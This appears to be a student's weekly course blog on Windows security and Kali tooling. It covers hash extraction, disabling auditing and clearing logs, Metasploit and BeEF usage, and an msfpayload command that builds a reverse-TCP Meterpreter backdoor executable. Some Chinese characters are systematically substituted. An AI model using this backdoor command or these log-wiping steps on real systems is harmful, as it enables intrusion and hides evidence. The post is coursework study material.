20169219 2016-2017-2《网络攻防》第七周做业

课本学习内容总结

第7章 Windows操做系统安全攻防

windows操做系统基本结构示意图

windows操做系统内核实现的核心机制有：

• Windows进程和线程管理机制
• Windows内存管理机制（Windows的虚拟内存空间分为系统核心内存区与用户内存区间两部分，系统核心内存用于映射内核、HAL、Win32k.sys等内核执行模块，并存储内核内存对象，对于内核中运行的特权代码，则可经过DKOM技术来进行枚举和操纵）、
• Windows文件管理机制（NTFS）、
• Windows注册表管理机制（注册表中的系统自启动挂接点上注册的应用软件能够随系统引导而自动运行，所以也是不少恶意代码及流氓软件广泛的攻击目标）、
• Windows的网络机制（从OSI网络参考模型的物理层到应用层，各层上对应的Windows网络组件模块包括以下：
  ①各层网卡硬件的设备驱动程序，处于OSI参考模型的物理层
  ②NDIS库及miniport驱动程序，位于OSI链路层
  ③TDI，对应OSI网络层与传输层
  ④网络APIDLL及TDI客户端，对应OSI会话层与表示层
  ⑤网络应用程序与服务进程，对应OSI应用层）。

Windows受权与访问控制机制

Windows的受权与访问控制机制是基于引用监控器模型，由内核中的SRM模块与用户态的LSASS服务共同来实施。
在Windows服务器操做系统中，用户能够执行内建的whoami命令来查看当前用户的访问令牌信息。
Windows对于系统中全部需保护的资源都抽象成对象，具体类型包括文件、目录、注册表键值、内核对象、同步对象、私有对象、管道、内存、通讯接口等，而对每一个对象会关联一个SD安全描述符.
对象安全描述符由以下主要属性组成：Owner SID、Group SID、DACL自主访问控制列表、SACL系统审计访问控制列表。

Windows 远程安全攻防技术

Windows远程攻防技术能够分为如下几大类：远程口令猜想与破解攻击、攻击Windows网络服务、攻击Windows客户端及用户。
Windows系统上的安全漏洞生命周期：漏洞发现与披露、渗透测试与利用攻击、漏洞修补等。

Windows的其余安全机制

身份认证、受权与访问控制以及安全审计是三个基本安全功能。
保护Windows系统安全稳定运行最为关键的三项安全措施——防火墙、补丁自动更新以及病毒防御。
除安全中心以外，Windows的安全特性还包括IPSec加密与验证机制、EFS加密文件系统、Windows文件保护机制、捆绑的IE浏览器所提供的隐私保护与浏览安全保护机制等

Windows系统口令字密文提取技术

在本地获取口令字密文的主要包括以下三种途径：
①从另外一种操做系统启动后拷贝文件系统中的口令密文文件
②利用硬盘修复工具包中的rdisk工具，执行“rdisk/s-”命令建立SAM备份文件副本
③使用pwdumpX系列工具直接从SAM文件或活动目录中提取口令字密文。

Windows消踪灭迹

①关闭审计功能（Windows Resource Kit工具包里的auditpol程序可让他们轻易地关闭审计功能）
②清理事件日志（使用Event Viewer事件查看器来打开、读取和清除这台主机上的事件日志）

视频学习总结

Kali漏洞利用之检索与利用

漏洞检索工具：Exploit Datebase>searchsploit

检索wordpass的漏洞，能够看到对应的文件地址

经过相对目录进入到文件对应的地址

cat查看文件内容

Kali漏洞之Metasploit基础

一、启动服务

在Kali中使用metasploit，须要先启动Postgre
SQL数据库服务和metasploit服务，而后就能够完整的利用msf数据库查询exploit和记录。

service postgresql start
service metasploit start

若是 不想每次开机都手动启动服务，能够配置随系统启动
update-rc.d postgresql enable
update-rc.d metasploit enable

二、路径介绍

Kali中msf的路径为/usr/share/metasploit-framework

Auxiliary:辅助模块
encoders：供msfencode编码工具使用，具体可使用msfencode -l。

exploits：攻击模块，每一个介绍msf的文章都会提到那个ms08_067_metapi，它就在这个目录。

payloads：这里面列出的是攻击载荷，也就是攻击成功后执行的代码，好比咱们常设置的windows/meterpreter/reverse_tcp就在这个文件夹下。

post：后渗透阶段模块，在得到meterpreter的shell以后可使用的攻击代码。好比经常使用的hashdump、arp_scanner就在这里。

三、基本命令

msfpayload：用来生成payload或者shellcode。

搜索的时候能够用msfpayload -l | grep "windows"这样的命令查询。

-o 选项能够列出payload所需的参数

msfencode：msf中的编码器，早期为了编码绕过AV，如今经常使用msfpayload与它编码避免exploit的坏字符串。

msfconsole：开启metasploit的console

发现漏洞 使用命令nmap -sV 192.168.1.124

使用set设置参数

Kali漏洞利用之Meterpreter介绍

Meterpreter是metasploit框架中的一个扩展模块，做为溢出成功之后的攻击载荷使用，攻击载荷在溢出攻击成功之后给咱们返回一个控制通道。使用它做为攻击载荷可以得到目标系统的一个meterpreter shell连接。

Meterpreter做为后渗透模块有多种类型，而且命令由核心命令和扩展库命令组成，极大的丰富了攻击方式。其有不少有用的功能，如添加一个用户、隐藏一些东西、打开shell、获得用户密码、上传下载远程主机文件、运行cmd.exe、捕捉屏幕、获得远程控制权、捕获按键信息、清楚应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。

经常使用的命令：

background：将当前会话放置后台

load/use：加载模块

Interact：切换进一个信道

migrate：迁移进程

run：执行一个已有的模块，这里要说的是输入run后按两下tab，会列出全部的已有的脚本，经常使用的有autoroute，hashdump，arp_scanner，multi_inject等

Resource：执行一个已有的rc脚本经常使用的Meterpreter类型为：payload/windows/meterpreter/reverse_tcp

针对windows操做系统，反向链接shell，使用起来比较稳定。

一、生成Meterpreter后门

命令：msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe

Kali漏洞利用之BeFF

一、命令行下启动Beef

此时浏览器自动打开页面

http://127.0.0.1:3000/ui/authentication
使用默认用户名beef与默认密码beef登陆

三、HOOK持续的时间为关闭测试页面为止，在此期间，至关于被控制了，能够发送攻击命令，在Commands模块，咱们能够完成不少任务：

其中，4种颜色分别表示：

绿色：该攻击模块可用，且隐蔽性强

灰色：该攻击模块可用，但隐蔽性差

橙色：该用户模块是否可用还有待验证

红色：该攻击模块不可用

四、例如，选取MISC下的Raw JavaScript模块做为测试用例，右端表格有该模块的详细说明，以及一些可用的参数等。输入JavaScript code，点击Excute进行攻击。

六、BeFF默认是不加载Metasploit的，若是要使用Metasploit丰富的攻击模块，须要作些配置。

修改/usr/share/beef-xss/config.yaml中的metasploit 一行为true

保证此处IP等信息设置正确（不适用127.0.0.1，需使用本机IP），并修改Custom路径

配置好后，打开msfconsole，运行命令：
load msgrpc ServerHost=192.168.1.124 Pass=abc123

上周错题总结

一、下面哪些Linux 命令能够ASCII码和16进制单字节方法输出Hello.java的内容？

od -tcx1 Hello.java
od -tc  -tx1 Hello.java

二、Netwox能够产生的数据报文有（IP、TCP、UDP）
三、中间人攻击能够破坏信息的机密性和完整性。
四、评估IDS的参数中，捕获的攻击和所有攻击之比为（检测率）
五、netfilter/iptables的规则表中，能够进行源IP和端口转换的是（nat表）
六、防火墙部署方式中，不能实现网络层和应用层双重安全的是？包过滤路由器、双宿主堡垒主机

学习进度条

	学习时间（新增/累计）	博客量（新增/累计）	重要成长
目标	400小时	30篇
第1周	15/15	1/1	linux基础知识
第2周	20/35	2/3	安全工具、环境搭建
第3周	15/50	2/5	Nma使用
第4周	15/65	1/6
第5周	15/80	1/7
第6周	15/95	1/8
第7周	12/107	1/9

参考资料

metasploit 使用教程

第七章Windows操做系统安全攻防总结